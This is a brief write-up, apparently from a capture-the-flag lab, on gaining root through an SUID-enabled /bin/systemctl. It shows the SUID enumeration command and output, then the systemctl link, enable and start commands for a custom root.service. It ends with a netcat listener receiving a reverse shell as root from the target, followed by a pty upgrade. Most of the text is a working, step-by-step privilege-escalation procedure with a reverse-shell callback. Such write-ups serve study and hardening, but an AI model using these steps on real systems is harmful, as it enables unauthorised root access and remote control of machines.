Systemctl (SUID enabled) privilege escalation


Scenario: we have an initial shell and, during the enumeration checks, we found that /bin/systemctl has the SUID bit set. Refer below:

find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device

Because the SUID bit makes /bin/systemctl run as root no matter who calls it, an unprivileged user can link and enable an arbitrary unit, and systemd then runs that unit's ExecStart as root. Checking GTFOBins confirms it has an SUID entry for this binary:

systemctl

I created a simple service and ran it with the "systemctl" command.

The simple service file (root.service from the tcprks/Rchitect repository on GitHub, branch Yoda) is as follows.

Now run these commands to link, enable and start the custom service through the SUID systemctl (the unit needs an [Install] section for enable to accept it, and enable --now already starts it, so the final start only matters if the job did not fire):

/bin/systemctl link /home/pepper/root.service
/bin/systemctl enable --now root.service
/bin/systemctl start root.service

The service's reverse shell connects back to the listener, and because systemd started it, the shell runs as root:

└─$ rlwrap nc -nvlp 2222
listening on [any] 2222 ...

connect to [10.10.14.3] from (UNKNOWN) [10.10.10.143] 56496
python -c 'import pty; pty.spawn("/bin/bash")'
whoami
whoami
root